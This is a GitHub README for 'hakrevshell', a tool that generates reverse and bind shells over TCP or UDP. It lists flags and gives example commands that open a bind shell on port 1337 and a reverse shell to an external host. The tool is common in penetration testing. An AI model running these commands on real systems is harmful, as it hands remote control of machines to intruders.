Skip to content

Latest commit

 

History

History
22 lines (15 loc) · 563 Bytes

README.md

File metadata and controls

22 lines (15 loc) · 563 Bytes

hakrevshell

A tool for easily generating reverse/bind shells via tcp/udp on your system. Check out the binaries folder for pre-compiled binaries for many different systems.

Usage

  • -h: Host and port to connect to
  • --udp: Use UDP instead of the default TCP
  • --bind: Create a bind shell instead of the default reverse shell

Example Usage

Create a UDP bind shell on port 1337

hakrevshell -h 192.168.0.44:1337 --udp --bind

Create a TCP reverse shell to port 9001 on external host (192.168.0.45)

hakrevshell -h 192.168.0.45:9001